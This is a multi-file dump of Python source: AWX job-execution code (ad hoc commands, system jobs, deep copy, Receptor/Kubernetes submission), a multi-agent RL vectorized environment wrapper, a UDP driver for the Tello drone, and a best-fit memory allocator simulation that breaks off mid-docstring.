        extra_vars = ad_hoc_command.awx_meta_vars()
        if ad_hoc_command.extra_vars_dict:
            redacted_extra_vars, removed_vars = extract_ansible_vars(ad_hoc_command.extra_vars_dict)
            if removed_vars:
                raise ValueError(_("{} are prohibited from use in ad hoc commands.").format(", ".join(removed_vars)))
            extra_vars.update(ad_hoc_command.extra_vars_dict)
        self._write_extra_vars_file(private_data_dir, extra_vars)

    def build_module_name(self, ad_hoc_command):
        return ad_hoc_command.module_name

    def build_module_args(self, ad_hoc_command):
        # Jinja in module args is a template-injection vector unless the
        # installation explicitly allows it.
        module_args = ad_hoc_command.module_args
        if settings.ALLOW_JINJA_IN_EXTRA_VARS != 'always':
            module_args = sanitize_jinja(module_args)
        return module_args

    def build_playbook_path_relative_to_cwd(self, job, private_data_dir):
        # Ad hoc commands run no playbook.
        return None

    def get_password_prompts(self, passwords=None):
        """Map expected interactive prompt regexes to password names.

        The ``passwords`` parameter is unused; its default was changed from a
        shared mutable ``{}`` to ``None`` (mutable-default pitfall) with no
        behavioral difference.
        """
        d = super(RunAdHocCommand, self).get_password_prompts()
        d[r'Enter passphrase for .*:\s*?$'] = 'ssh_key_unlock'
        d[r'Bad passphrase, try again for .*:\s*?$'] = ''
        for method in PRIVILEGE_ESCALATION_METHODS:
            d[r'%s password.*:\s*?$' % (method[0])] = 'become_password'
            d[r'%s password.*:\s*?$' % (method[0].upper())] = 'become_password'
        d[r'BECOME password.*:\s*?$'] = 'become_password'
        d[r'SSH password:\s*?$'] = 'ssh_password'
        d[r'Password:\s*?$'] = 'ssh_password'
        return d
@task(queue=get_local_queuename)
class RunSystemJob(BaseTask):
    """Run a management (system) job by invoking ``awx-manage`` directly."""

    model = SystemJob
    event_model = SystemJobEvent
    event_data_key = 'system_job_id'

    def build_execution_environment_params(self, system_job, private_data_dir):
        # System jobs do not run inside an execution environment container.
        return {}

    def build_args(self, system_job, private_data_dir, passwords):
        """Build the awx-manage command line from the job type and extra_vars.

        Parse errors in extra_vars are logged and ignored, so the command
        still runs with whatever arguments were assembled.
        """
        args = ['awx-manage', system_job.job_type]
        try:
            # System Job extra_vars can be blank, must be JSON if not blank
            if system_job.extra_vars == '':
                json_vars = {}
            else:
                json_vars = json.loads(system_job.extra_vars)
            if system_job.job_type in ('cleanup_jobs', 'cleanup_activitystream'):
                if 'days' in json_vars:
                    args.extend(['--days', str(json_vars.get('days', 60))])
                if 'dry_run' in json_vars and json_vars['dry_run']:
                    args.extend(['--dry-run'])
            if system_job.job_type == 'cleanup_jobs':
                # Clean up every unified-job flavor, not only plain jobs.
                args.extend(
                    ['--jobs', '--project-updates', '--inventory-updates', '--management-jobs', '--ad-hoc-commands', '--workflow-jobs', '--notifications']
                )
        except Exception:
            logger.exception("{} Failed to parse system job".format(system_job.log_format))
        return args

    def write_args_file(self, private_data_dir, args):
        # Same owner-read-only args file as RunInventoryUpdate.write_args_file.
        path = os.path.join(private_data_dir, 'args')
        handle = os.open(path, os.O_RDWR | os.O_CREAT, stat.S_IREAD | stat.S_IWRITE)
        f = os.fdopen(handle, 'w')
        f.write(' '.join(args))
        f.close()
        os.chmod(path, stat.S_IRUSR)
        return path

    def build_env(self, instance, private_data_dir, private_data_files=None):
        base_env = super(RunSystemJob, self).build_env(instance, private_data_dir, private_data_files=private_data_files)
        # TODO: this is able to run by turning off isolation
        # the goal is to run it a container instead
        # awx-manage needs the full process environment, overlaid with the
        # task-specific variables.
        env = dict(os.environ.items())
        env.update(base_env)
        return env

    def build_playbook_path_relative_to_cwd(self, job, private_data_dir):
        # System jobs run no playbook.
        return None

    def build_inventory(self, instance, private_data_dir):
        # System jobs use no inventory.
        return None
def _reconstruct_relationships(copy_mapping):
    """Re-wire relational fields on deep-copied model objects.

    For every (original, copy) pair, each field named in the model's
    FIELDS_TO_PRESERVE_AT_COPY is carried over: ForeignKeys are pointed at
    the copied counterpart when one exists in the mapping (otherwise the
    original related object), and many-to-many memberships are re-added the
    same way. Each copy is saved afterwards.

    :param copy_mapping: dict mapping original objects to their copies
    """
    for old_obj, new_obj in copy_mapping.items():
        model = type(old_obj)
        for field_name in getattr(model, 'FIELDS_TO_PRESERVE_AT_COPY', []):
            field = model._meta.get_field(field_name)
            if isinstance(field, ForeignKey):
                if getattr(new_obj, field_name, None):
                    # Copy already has this FK set; do not overwrite it.
                    continue
                related_obj = getattr(old_obj, field_name)
                # Prefer the copied counterpart when the relation target was
                # itself copied.
                related_obj = copy_mapping.get(related_obj, related_obj)
                setattr(new_obj, field_name, related_obj)
            elif field.many_to_many:
                for related_obj in getattr(old_obj, field_name).all():
                    logger.debug('Deep copy: Adding {} to {}({}).{} relationship'.format(related_obj, new_obj, model, field_name))
                    getattr(new_obj, field_name).add(copy_mapping.get(related_obj, related_obj))
        new_obj.save()
@task(queue=get_local_queuename)
def deep_copy_model_obj(model_module, model_name, obj_pk, new_obj_pk, user_pk, uuid, permission_check_func=None):
    """Background task that finishes a deep copy started by CopyAPIView.

    The list of sub-objects to copy was stashed in the cache under ``uuid``
    by the API view. Each sub-object is copied under the new parent, the
    preserved relationships are re-wired, and an optional permission check
    (passed as an importable (module, class, attr) triple) is applied to the
    copies. Missing cache data, models, or records cause an early return
    rather than an error.
    """
    sub_obj_list = cache.get(uuid)
    if sub_obj_list is None:
        logger.error('Deep copy {} from {} to {} failed unexpectedly.'.format(model_name, obj_pk, new_obj_pk))
        return
    logger.debug('Deep copy {} from {} to {}.'.format(model_name, obj_pk, new_obj_pk))
    # Imported locally to avoid circular imports at module load time.
    from awx.api.generics import CopyAPIView
    from awx.main.signals import disable_activity_stream

    model = getattr(importlib.import_module(model_module), model_name, None)
    if model is None:
        return
    try:
        obj = model.objects.get(pk=obj_pk)
        new_obj = model.objects.get(pk=new_obj_pk)
        creater = User.objects.get(pk=user_pk)
    except ObjectDoesNotExist:
        logger.warning("Object or user no longer exists.")
        return
    # Copy everything in one transaction, with activity stream and inventory
    # computed-field updates suppressed for the duration.
    with transaction.atomic(), ignore_inventory_computed_fields(), disable_activity_stream():
        copy_mapping = {}
        for sub_obj_setup in sub_obj_list:
            # Each entry is (module_name, model_name, pk) of a sub-object.
            sub_model = getattr(importlib.import_module(sub_obj_setup[0]), sub_obj_setup[1], None)
            if sub_model is None:
                continue
            try:
                sub_obj = sub_model.objects.get(pk=sub_obj_setup[2])
            except ObjectDoesNotExist:
                continue
            copy_mapping.update(CopyAPIView.copy_model_obj(obj, new_obj, sub_model, sub_obj, creater))
        _reconstruct_relationships(copy_mapping)
        if permission_check_func:
            # Resolve (module, class, attr) into the callable and verify the
            # creating user may access everything that was copied.
            permission_check_func = getattr(getattr(importlib.import_module(permission_check_func[0]), permission_check_func[1]), permission_check_func[2])
            permission_check_func(creater, copy_mapping.values())
    if isinstance(new_obj, Inventory):
        # Recompute inventory counters now that suppression is lifted.
        update_inventory_computed_fields.delay(new_obj.id)
class TransmitterThread(threading.Thread):
    """Thread that records any exception raised by its target in ``self.exc``.

    ``exc`` is ``None`` after a clean run, otherwise the ``sys.exc_info()``
    triple, so the spawning thread can re-raise it after ``join()``.
    """

    def run(self):
        # Assume success until the target proves otherwise.
        self.exc = None
        try:
            threading.Thread.run(self)
        except Exception:
            # Stash (type, value, traceback) for the parent thread.
            self.exc = sys.exc_info()
class AWXReceptorJob:
    """Submits an ansible-runner job to Receptor and processes its results.

    The payload (private data dir + kwargs) is streamed to Receptor over a
    socketpair; the resulting work unit is monitored for cancellation and
    its output is fed back through ansible-runner's "process" streamer.
    """
    def __init__(self, task=None, runner_params=None):
        # task: AWX task wrapper (exposes .instance, callbacks, etc.);
        # runner_params: kwargs eventually passed to ansible_runner.interface.run.
        self.task = task
        self.runner_params = runner_params
        # Receptor work unit id; set once submit_work succeeds.
        self.unit_id = None
        if self.task and not self.task.instance.is_container_group_task:
            # Local (non-container-group) jobs get execution-environment
            # settings merged into the runner settings up front.
            execution_environment_params = self.task.build_execution_environment_params(self.task.instance, runner_params['private_data_dir'])
            self.runner_params['settings'].update(execution_environment_params)
    def run(self):
        """Run the job through Receptor, always releasing the work unit."""
        # We establish a connection to the Receptor socket
        receptor_ctl = ReceptorControl('/var/run/receptor/receptor.sock')
        try:
            return self._run_internal(receptor_ctl)
        finally:
            # Make sure to always release the work unit if we established it
            if self.unit_id is not None and settings.RECEPTOR_RELEASE_WORK:
                receptor_ctl.simple_command(f"work release {self.unit_id}")
    def _run_internal(self, receptor_ctl):
        """Submit the work unit, stream results, and watch for cancellation."""
        # Create a socketpair. Where the left side will be used for writing our payload
        # (private data dir, kwargs). The right side will be passed to Receptor for
        # reading.
        sockin, sockout = socket.socketpair()
        transmitter_thread = TransmitterThread(target=self.transmit, args=[sockin])
        transmitter_thread.start()
        # submit our work, passing
        # in the right side of our socketpair for reading.
        result = receptor_ctl.submit_work(worktype=self.work_type, payload=sockout.makefile('rb'), params=self.receptor_params)
        self.unit_id = result['unitid']
        sockin.close()
        sockout.close()
        # NOTE(review): `exc` is inspected before join(), so a transmit failure
        # that occurs after this check but before the thread exits would be
        # missed — confirm whether the join() should come first.
        if transmitter_thread.exc:
            raise transmitter_thread.exc[1].with_traceback(transmitter_thread.exc[2])
        transmitter_thread.join()
        resultsock, resultfile = receptor_ctl.get_work_results(self.unit_id, return_socket=True, return_sockfile=True)
        # Both "processor" and "cancel_watcher" are spawned in separate threads.
        # We wait for the first one to return. If cancel_watcher returns first,
        # we yank the socket out from underneath the processor, which will cause it
        # to exit. A reference to the processor_future is passed into the cancel_watcher_future,
        # Which exits if the job has finished normally. The context manager ensures we do not
        # leave any threads laying around.
        with concurrent.futures.ThreadPoolExecutor(max_workers=2) as executor:
            processor_future = executor.submit(self.processor, resultfile)
            cancel_watcher_future = executor.submit(self.cancel_watcher, processor_future)
            futures = [processor_future, cancel_watcher_future]
            first_future = concurrent.futures.wait(futures, return_when=concurrent.futures.FIRST_COMPLETED)
            res = list(first_future.done)[0].result()
            if res.status == 'canceled':
                # Tear the result socket down so the processor thread exits.
                receptor_ctl.simple_command(f"work cancel {self.unit_id}")
                resultsock.shutdown(socket.SHUT_RDWR)
                resultfile.close()
            elif res.status == 'error':
                # TODO: There should be a more efficient way of getting this information
                receptor_work_list = receptor_ctl.simple_command("work list")
                detail = receptor_work_list[self.unit_id]['Detail']
                state_name = receptor_work_list[self.unit_id]['StateName']
                if 'exceeded quota' in detail:
                    # NOTE(review): logger.warn is a deprecated alias of
                    # logger.warning.
                    logger.warn(detail)
                    log_name = self.task.instance.log_format
                    logger.warn(f"Could not launch pod for {log_name}. Exceeded quota.")
                    # Requeue the job instead of failing it outright.
                    self.task.update_model(self.task.instance.pk, status='pending')
                    return
                # If ansible-runner ran, but an error occurred at runtime, the traceback
                # information is saved via the status_handler passed in to the processor.
                if state_name == 'Succeeded':
                    return res
                raise RuntimeError(detail)
        return res
    # Spawned in a thread so Receptor can start reading before we finish writing, we
    # write our payload to the left side of our socketpair.
    @cleanup_new_process
    def transmit(self, _socket):
        """Stream the runner payload into the write side of the socketpair."""
        if not settings.IS_K8S and self.work_type == 'local':
            # Local work shares the filesystem, so only kwargs need to travel.
            self.runner_params['only_transmit_kwargs'] = True
        try:
            ansible_runner.interface.run(streamer='transmit', _output=_socket.makefile('wb'), **self.runner_params)
        finally:
            # Socket must be shutdown here, or the reader will hang forever.
            _socket.shutdown(socket.SHUT_WR)
    @cleanup_new_process
    def processor(self, resultfile):
        """Consume the Receptor result stream via ansible-runner's processor."""
        return ansible_runner.interface.run(
            streamer='process',
            quiet=True,
            _input=resultfile,
            event_handler=self.task.event_handler,
            finished_callback=self.task.finished_callback,
            status_handler=self.task.status_handler,
            **self.runner_params,
        )
    @property
    def receptor_params(self):
        """Receptor work submission params (pod spec for container groups)."""
        if self.task.instance.is_container_group_task:
            spec_yaml = yaml.dump(self.pod_definition, explicit_start=True)
            receptor_params = {
                "secret_kube_pod": spec_yaml,
                "pod_pending_timeout": getattr(settings, 'AWX_CONTAINER_GROUP_POD_PENDING_TIMEOUT', "5m"),
            }
            if self.credential:
                kubeconfig_yaml = yaml.dump(self.kube_config, explicit_start=True)
                receptor_params["secret_kube_config"] = kubeconfig_yaml
        else:
            private_data_dir = self.runner_params['private_data_dir']
            receptor_params = {"params": f"--private-data-dir={private_data_dir}"}
        return receptor_params
    @property
    def work_type(self):
        """Receptor work type: kubernetes (with/without auth) or local."""
        if self.task.instance.is_container_group_task:
            if self.credential:
                work_type = 'kubernetes-runtime-auth'
            else:
                work_type = 'kubernetes-incluster-auth'
        else:
            work_type = 'local'
        return work_type
    @cleanup_new_process
    def cancel_watcher(self, processor_future):
        """Poll once per second for task cancellation while processing runs.

        Returns the processor's result when it finishes first, or a
        namedtuple with status 'canceled' when the task was cancelled.
        """
        while True:
            if processor_future.done():
                return processor_future.result()
            if self.task.cancel_callback():
                result = namedtuple('result', ['status', 'rc'])
                return result('canceled', 1)
            # Record the Receptor unit id on the job env once known so it is
            # visible for debugging/cleanup.
            if hasattr(self, 'unit_id') and 'RECEPTOR_UNIT_ID' not in self.task.instance.job_env:
                self.task.instance.job_env['RECEPTOR_UNIT_ID'] = self.unit_id
                self.task.update_model(self.task.instance.pk, job_env=self.task.instance.job_env)
            time.sleep(1)
    @property
    def pod_definition(self):
        """Kubernetes pod spec for container-group jobs (default + overrides)."""
        if self.task:
            ee = self.task.instance.resolve_execution_environment()
        else:
            ee = get_default_execution_environment()
        default_pod_spec = get_default_pod_spec()
        pod_spec_override = {}
        if self.task and self.task.instance.instance_group.pod_spec_override:
            pod_spec_override = parse_yaml_or_json(self.task.instance.instance_group.pod_spec_override)
        # Override keys win over the defaults.
        pod_spec = {**default_pod_spec, **pod_spec_override}
        pod_spec['spec']['containers'][0]['image'] = ee.image
        pod_spec['spec']['containers'][0]['args'] = ['ansible-runner', 'worker', '--private-data-dir=/runner']
        # Enforce EE Pull Policy
        pull_options = {"always": "Always", "missing": "IfNotPresent", "never": "Never"}
        if self.task and self.task.instance.execution_environment:
            if self.task.instance.execution_environment.pull:
                pod_spec['spec']['containers'][0]['imagePullPolicy'] = pull_options[self.task.instance.execution_environment.pull]
        if self.task and self.task.instance.is_container_group_task:
            # If EE credential is passed, create an imagePullSecret
            if self.task.instance.execution_environment and self.task.instance.execution_environment.credential:
                # Create pull secret in k8s cluster based on ee cred
                from awx.main.scheduler.kubernetes import PodManager  # prevent circular import
                pm = PodManager(self.task.instance)
                secret_name = pm.create_secret(job=self.task.instance)
                # Inject secret name into podspec
                pod_spec['spec']['imagePullSecrets'] = [{"name": secret_name}]
        if self.task:
            # Tag the pod with a stable name and AWX-identifying labels.
            pod_spec['metadata'] = deepmerge(
                pod_spec.get('metadata', {}),
                dict(name=self.pod_name, labels={'ansible-awx': settings.INSTALL_UUID, 'ansible-awx-job-id': str(self.task.instance.id)}),
            )
        return pod_spec
    @property
    def pod_name(self):
        """Deterministic pod name derived from the job id."""
        return f"automation-job-{self.task.instance.id}"
    @property
    def credential(self):
        """Kubernetes credential attached to the job's instance group."""
        return self.task.instance.instance_group.credential
    @property
    def namespace(self):
        """Namespace taken from the rendered pod definition."""
        return self.pod_definition['metadata']['namespace']
    @property
    def kube_config(self):
        """Build an in-memory kubeconfig dict from the K8s credential."""
        host_input = self.credential.get_input('host')
        config = {
            "apiVersion": "v1",
            "kind": "Config",
            "preferences": {},
            "clusters": [{"name": host_input, "cluster": {"server": host_input}}],
            "users": [{"name": host_input, "user": {"token": self.credential.get_input('bearer_token')}}],
            "contexts": [{"name": host_input, "context": {"cluster": host_input, "user": host_input, "namespace": self.namespace}}],
            "current-context": host_input,
        }
        if self.credential.get_input('verify_ssl') and 'ssl_ca_cert' in self.credential.inputs:
            config["clusters"][0]["cluster"]["certificate-authority-data"] = b64encode(
                self.credential.get_input('ssl_ca_cert').encode()  # encode to bytes
            ).decode()  # decode the base64 data into a str
        else:
            config["clusters"][0]["cluster"]["insecure-skip-tls-verify"] = True
        return config
|
env_wrappers.py
|
"""
Modified from OpenAI Baselines code to work with multi-agent envs
"""
import numpy as np
from multiprocessing import Process, Pipe
from baselines.common.vec_env import VecEnv, CloudpickleWrapper
from baselines.common.tile_images import tile_images
def worker(remote, parent_remote, env_fn_wrapper):
    """Subprocess entry point: serve environment commands over `remote`.

    The parent process keeps `parent_remote`, so our inherited copy is
    closed immediately; we then answer commands until 'close' arrives.
    """
    parent_remote.close()
    env = env_fn_wrapper.x()
    while True:
        cmd, payload = remote.recv()
        if cmd == 'step':
            ob, reward, done, info = env.step(payload)
            # A multi-agent episode ends only when every agent is done.
            if all(done):
                ob = env.reset()
            remote.send((ob, reward, done, info))
        elif cmd == 'reset':
            remote.send(env.reset())
        elif cmd == 'reset_task':
            remote.send(env.reset_task())
        elif cmd == 'get_spaces':
            remote.send((env.observation_space, env.action_space))
        elif cmd == 'get_agent_types':
            if all(hasattr(agent, 'adversary') for agent in env.agents):
                agent_types = ['adversary' if agent.adversary else 'agent'
                               for agent in env.agents]
            else:
                agent_types = ['agent' for _ in env.agents]
            remote.send(agent_types)
        elif cmd == 'close':
            remote.close()
            break
        else:
            raise NotImplementedError
class SubprocVecEnv(VecEnv):
    """Vectorized environment that runs each sub-env in its own subprocess."""
    def __init__(self, env_fns, spaces=None):
        """
        envs: list of gym environments to run in subprocesses
        """
        self.waiting = False
        # NOTE(review): this also instantiates every env in the parent process,
        # duplicating the instances created inside the workers — confirm
        # whether anything actually uses this parent-side self.envs.
        self.envs = [fn() for fn in env_fns]  # newly added
        self.closed = False
        nenvs = len(env_fns)
        # One pipe per env: `remotes` stay in the parent, `work_remotes` go
        # to the worker processes.
        self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(nenvs)])
        self.ps = [Process(target=worker, args=(work_remote, remote, CloudpickleWrapper(env_fn)))
                   for (work_remote, remote, env_fn) in zip(self.work_remotes, self.remotes, env_fns)]
        for p in self.ps:
            p.daemon = True  # if the main process crashes, we should not cause things to hang
            p.start()
        # Close the parent's copies of the worker-side pipe ends so EOF
        # propagates when a worker exits.
        for remote in self.work_remotes:
            remote.close()
        # Query spaces/agent types once from the first worker.
        self.remotes[0].send(('get_spaces', None))
        observation_space, action_space = self.remotes[0].recv()
        self.remotes[0].send(('get_agent_types', None))
        self.agent_types = self.remotes[0].recv()
        VecEnv.__init__(self, len(env_fns), observation_space, action_space)
    def step_async(self, actions):
        """Dispatch one action per worker without waiting for results."""
        for remote, action in zip(self.remotes, actions):
            remote.send(('step', action))
        self.waiting = True
    def step_wait(self):
        """Collect the results of a previous step_async call."""
        results = [remote.recv() for remote in self.remotes]
        self.waiting = False
        obs, rews, dones, infos = zip(*results)
        return np.stack(obs), np.stack(rews), np.stack(dones), infos
    def reset(self):
        """Reset every sub-env and stack the initial observations."""
        for remote in self.remotes:
            remote.send(('reset', None))
        return np.stack([remote.recv() for remote in self.remotes])
    def reset_task(self):
        """Call reset_task on every sub-env and stack the results."""
        for remote in self.remotes:
            remote.send(('reset_task', None))
        return np.stack([remote.recv() for remote in self.remotes])
    def close(self):
        """Drain any pending results, tell workers to exit, and join them."""
        if self.closed:
            return
        if self.waiting:
            # Finish an in-flight step so workers are not blocked on send.
            for remote in self.remotes:
                remote.recv()
        for remote in self.remotes:
            remote.send(('close', None))
        for p in self.ps:
            p.join()
        self.closed = True
class DummyVecEnv(VecEnv):
    """In-process vectorized wrapper: steps each env sequentially, no subprocesses."""

    def __init__(self, env_fns):
        self.envs = [factory() for factory in env_fns]
        first = self.envs[0]
        VecEnv.__init__(self, len(env_fns), first.observation_space, first.action_space)
        # Classify agents as adversaries when the env exposes that flag.
        if all(hasattr(agent, 'adversary') for agent in first.agents):
            self.agent_types = ['adversary' if agent.adversary else 'agent'
                                for agent in first.agents]
        else:
            self.agent_types = ['agent' for _ in first.agents]
        # Per-env step counters, reset whenever an episode ends.
        self.ts = np.zeros(len(self.envs), dtype='int')
        self.actions = None

    def step_async(self, actions):
        # Nothing runs asynchronously here; just remember the actions.
        self.actions = actions

    def step_wait(self):
        stepped = [env.step(action) for (action, env) in zip(self.actions, self.envs)]
        obs, rews, dones, infos = map(np.array, zip(*stepped))
        self.ts += 1
        for idx, done in enumerate(dones):
            # Multi-agent episode ends only when every agent is done.
            if all(done):
                obs[idx] = self.envs[idx].reset()
                self.ts[idx] = 0
        self.actions = None
        return np.array(obs), np.array(rews), np.array(dones), infos

    def reset(self):
        return np.array([env.reset() for env in self.envs])

    def close(self):
        return
|
tello.py
|
import socket
import threading
import cv2
import logging
import time
class Tello:
    """Minimal driver for the Ryze/DJI Tello SDK over UDP.

    One socket sends commands and receives acknowledgements (port 8889),
    a second receives the periodic state broadcast (port 8890), and the
    video stream is read with OpenCV from udp://0.0.0.0:11111.
    """

    # logger setup
    handler = logging.StreamHandler()
    formatter = logging.Formatter('%(message)s')
    handler.setFormatter(formatter)
    logger = logging.getLogger('tello')
    logger.addHandler(handler)
    logger.setLevel(logging.INFO)
    # client port (local end of the command socket)
    client_ip = ''
    client_port = 8889
    # video port
    video_ip = '0.0.0.0'
    video_port = 11111
    # state port
    state_port = 8890
    # minimum spacing between consecutive commands, in seconds
    wait_time = 0.5
    # how long to wait for a command acknowledgement, in seconds
    max_response_time = 7

    def __init__(self):
        tello_ip = '192.168.10.1'
        tello_port = 8889
        enable_exceptions = True
        retry_count = 3
        self.cap = None
        # BUGFIX: this was previously assigned to a *local* variable, so the
        # attribute never existed until the first send_command. Stored in
        # milliseconds to match the arithmetic in send_command.
        self.last_received_command = time.time() * 1000
        self.address = (tello_ip, tello_port)
        self.command_timeout = 0.3
        self.imperial = False
        self.response = None
        self.response_state = None  # latest raw state datagram from the drone
        self.stream_on = False
        self.enable_exceptions = enable_exceptions
        self.retry_count = retry_count
        # socket to communicate with Tello
        self.socket_client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)  # sending commands
        self.socket_state = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)  # receiving Tello state
        self.socket_client.bind(('', self.client_port))
        self.socket_state.bind(('', self.state_port))
        # background thread receiving acknowledge/error responses from Tello
        thread1 = threading.Thread(target=self.receive_thread, args=())
        thread1.daemon = True
        thread1.start()
        # background thread receiving state broadcasts from Tello
        thread2 = threading.Thread(target=self.get_state, args=())
        thread2.daemon = True
        thread2.start()

    def get_state(self):
        """Run in the background, storing the latest state datagram."""
        while True:
            try:
                # BUGFIX: 1024-byte buffer — the state string can exceed the
                # previous 128-byte buffer, which silently truncated it.
                self.response_state, _ = self.socket_state.recvfrom(1024)
            except Exception as e:
                self.logger.error(e)
                break

    def receive_thread(self):
        """Run in the background, storing the latest command response."""
        while True:
            try:
                self.response, _ = self.socket_client.recvfrom(1024)
            except Exception as e:
                self.logger.error(e)
                break

    def video_address(self):
        """Return the UDP URL OpenCV should open for the video stream."""
        return 'udp://@' + self.video_ip + ':' + str(self.video_port)  # + '?overrun_nonfatal=1&fifo_size=5000'

    def video_capture(self):
        """Read one frame from the active capture.

        NOTE: cv2.VideoCapture.read() returns a (success, frame) tuple, and
        that tuple is what is stored/returned here, preserving the original
        behavior — callers must unpack it themselves.
        """
        self.frame = self.cap.read()
        return self.frame

    def video_capture_start(self):
        """Enable the drone's stream and open an OpenCV capture on it.

        :return: self, so calls can be chained
        """
        self.streamon()
        self.cap = cv2.VideoCapture(self.video_address())
        self.cap.open(self.video_address())
        return self

    def video_capture_stop(self):
        """Tell the drone to stop streaming video."""
        self.streamoff()

    def send_command(self, command):
        """Send `command` and wait for the drone's textual response.

        :param command: SDK command string to send
        :return: the decoded response string, or False on timeout
        """
        # Throttle: leave at least wait_time seconds between commands.
        # BUGFIX: previously computed `time.time()*1000 - wait_time`, which
        # never throttled and could sleep for an enormous duration.
        elapsed_ms = time.time() * 1000 - self.last_received_command
        if elapsed_ms < self.wait_time * 1000:
            time.sleep((self.wait_time * 1000 - elapsed_ms) / 1000.0)
        self.logger.info('Send command: ' + command)
        timestamp = int(time.time() * 1000)
        self.socket_client.sendto(command.encode('utf-8'), self.address)
        # Busy-wait for the receive thread to populate self.response.
        while self.response is None:
            if (time.time() * 1000) - timestamp > self.max_response_time * 1000:
                self.logger.warning('Timeout exceed on command ' + command)
                return False
        tello_response = self.response.decode('utf-8').rstrip("\r\n")
        self.logger.info('Response from Tello: ' + tello_response)
        self.response = None
        self.last_received_command = time.time() * 1000
        return tello_response

    def send_command_noreturn(self, command):
        """Send `command` without waiting for any response."""
        self.logger.info('Send command (w/ no response): ' + command)
        self.socket_client.sendto(command.encode('utf-8'), self.address)

    def send_control_command(self, command):
        """Send a control command, retrying up to retry_count times.

        Control commands include: command, takeoff, land, streamon,
        streamoff, emergency, up/down/left/right/forward/back x (20-500 cm),
        cw/ccw x (1-3600 deg), speed x (10-100 cm/s).

        :return: True on an OK response; otherwise delegates to
                 command_error, which raises when self.enable_exceptions is
                 set and returns False otherwise.
        """
        response = None
        for i in range(0, self.retry_count):
            response = self.send_command(command)
            if response == 'OK' or response == 'ok':
                return True
        # BUGFIX: previously fell through and silently returned None.
        return self.command_error(command, response, self.enable_exceptions)

    def command_error(self, command, response, enable_exceptions):
        """Handle an unsuccessful command.

        BUGFIX: `self` was missing from the signature, so any call raised a
        TypeError and the body's use of self.logger could never work.

        :raises Exception: when enable_exceptions is truthy
        :return: False when exceptions are disabled
        """
        message = 'Command ' + command + ' was unsuccessful. Response from Tello: ' + str(response)
        if enable_exceptions:
            raise Exception(message)
        else:
            self.logger.error(message)
            return False

    ##############################################################################################
    #####               CONTROL COMMANDS FOR TELLO                                           #####
    ##############################################################################################
    # methods return True or False if command was successful/unsuccessful

    def connect(self):
        """Enter SDK mode."""
        return self.send_control_command("command")

    def streamon(self):
        """Turn the video stream on."""
        return self.send_control_command("streamon")

    def streamoff(self):
        """Turn the video stream off."""
        return self.send_control_command("streamoff")

    def takeoff(self):
        """Auto takeoff."""
        return self.send_control_command("takeoff")

    def land(self):
        """Auto land."""
        return self.send_control_command("land")

    def emergency(self):
        """Stop all motors immediately."""
        return self.send_control_command("emergency")

    def move(self, direction, distance):
        """Fly `distance` cm in `direction` (up/down/left/right/forward/back).

        The distance is clamped to the SDK's valid range of 20-500 cm.
        """
        if distance < 20:
            distance = 20
        elif distance > 500:
            distance = 500
        move_command = "%s %s" % (direction, distance)
        return self.send_control_command(move_command)

    def rotate(self, direction, angle):
        """Rotate `angle` degrees in `direction` ('cw' or 'ccw').

        The angle is clamped to the SDK's valid range of 1-3600 degrees.
        """
        if angle < 1:
            angle = 1
        elif angle > 3600:
            angle = 3600
        rotate_command = "%s %s" % (direction, angle)
        return self.send_control_command(rotate_command)

    def set_speed(self, speed):
        """Set the flight speed in cm/s, clamped to the valid range 10-100."""
        if speed < 10:
            speed = 10
        elif speed > 100:
            speed = 100
        speed_command = "speed %s" % (speed)
        return self.send_control_command(speed_command)

    def end(self):
        """Stop streaming and release the OpenCV capture, if any."""
        self.video_capture_stop()
        # BUGFIX: guard against end() being called before any capture was
        # opened (self.cap is None in that case).
        if self.cap is not None:
            self.cap.release()
|
memory.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# By Allex Lima <allexlima@unn.edu.br> | www.allexlima.com
import support
from threading import Thread
class Block(object):
    """A single memory block: a hex address plus total/available sizes."""

    def __init__(self, size=None):
        self.address = None
        self.size = {
            'total': size,
            'available': size
        }
        self.content = []
        self.__pseudo_values_maker()

    def __pseudo_values_maker(self):
        """Fill the block attributes with pseudo-random values.

        The address is always randomized via support.g_int_value; the size
        is randomized only when testing mode (support.TESTING) is off,
        otherwise the size given to the constructor is kept.
        """
        # Address: random int in [10000, 30000], rendered as hexadecimal.
        self.address = hex(support.g_int_value((10000, 30000)))
        if support.TESTING is not True:
            # One random value shared by 'total' and 'available'.
            random_size = support.g_int_value()
            self.size['total'] = random_size
            self.size['available'] = random_size
class Memory(object):
    """A fixed-width collection of Block objects."""

    def __init__(self, width):
        self.__list = []
        self.width = width
        self.__pseudo_values_maker()

    def __pseudo_values_maker(self):
        """Populate the internal list with `width` Block objects.

        :return void
        """
        for index in range(self.width):
            if support.TESTING is True:
                # Testing mode: sizes come from the fixed support.SIZES table.
                self.__list.append(Block(support.SIZES[index]))
            else:
                # Otherwise the Block constructor randomizes its own size.
                self.__list.append(Block())

    def get_block(self, address):
        """Return the Block whose address matches, or None when absent.

        :param address: string with the block's address value
        :return: Block object or None
        """
        for block in self.__list:
            if block.address == address:
                return block
        return None

    def get_array(self):
        """Return the underlying list of blocks, i.e. the memory array.

        :return: list
        """
        return self.__list

    def alloc_in(self, obj, address):
        """Place a Process object into the block found at `address`.

        Silently does nothing when the address is unknown: get_block
        returns None and the attribute access raises AttributeError,
        which is swallowed (preserving the original behavior).

        :param obj: must be a Process object
        :param address: the address attribute of some Block object
        :return: void
        """
        try:
            target = self.get_block(address)
            target.content.append(obj)
            target.size['available'] -= obj.size
            obj.state = support.P_STATES[1]
        except AttributeError:
            pass
class MemoryManager(Memory):
    """High-level allocator on top of Memory using a best-fit strategy."""

    def __init__(self, m_blocks_quantity=10):
        """Build the memory; in testing mode the width follows support.SIZES.

        :param m_blocks_quantity: number of blocks when not in testing mode
        """
        super(MemoryManager, self).__init__(m_blocks_quantity if support.TESTING is not True else len(support.SIZES))
        self.memory = self.get_array()

    @staticmethod
    def __listing_style(obj):
        """Render a Block as a plain dict suitable for printing."""
        return {
            'address': obj.address,
            'size': {
                'total': "{0} KiB".format(obj.size['total']),
                'available': "{0} KiB".format(obj.size['available']),
            },
            'content': [{'pid': item.pid, 'size': '{0} KiB'.format(item.size)} for item in obj.content]
        }

    def best_fit(self, process):
        """Return the address of the block that best fits `process`.

        The best block is the one with enough available space whose size is
        closest to the process size. When no block can hold the process,
        a warning is appended to support.ERRORS and None is returned.

        :param process: must be a Process object (uses `size` and `pid`)
